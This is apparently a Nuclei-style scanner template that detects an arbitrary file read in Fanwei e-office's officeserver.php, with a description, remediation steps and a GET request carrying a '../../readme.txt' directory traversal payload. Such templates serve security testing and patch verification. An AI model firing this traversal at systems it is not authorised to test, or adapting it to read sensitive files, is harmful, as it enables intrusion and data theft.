id: wooyun-2015-0125638_2
info:
  name: Fanwei e-office officeserver.php Arbitrary File Read
  author:
  - 折跃
  description: |-
    Fanwei E-office officeserver.php Arbitrary File Read Vulnerability
    Fanwei E-office is one of the products in the Fanwei collaborative office product family. It is tailored to the actual needs of office applications and adopts a generalized product design.

    An arbitrary file read vulnerability exists in Fanwei E-office. An attacker can exploit it to read arbitrary files.
  severity: medium
  remediation: |-
    Official remediation:
    1. It is recommended that users obtain the latest patch or the latest version of the program from the vendor:
    https://www.weaver.com.cn/

    Temporary remediation:
    1. Filter "." so that users cannot navigate to parent directories from URLs.
    2. Strictly validate the format of user input parameters with regular expressions, hardcode or uniformly encode the filename parameters passed by users, whitelist file types, and reject parameters containing malicious or empty characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict the file access scope.
    4. Store file paths in the database and allow users to download files by submitting the corresponding file ID.
    5. Verify user permissions before file downloads.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'www.weaver.com.cn')
  path:
  - '{{BaseURL}}/{{varPath}}?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../readme.txt'
  attack: batteringram
  method: GET
  payloads:
    varPath:
    - iweboffice/officeserver.php
    - iweboffice/officeserver2.php
  headers:
    Host: '{{Hostname}}'
  req-condition: true
  stop-at-first-match: true
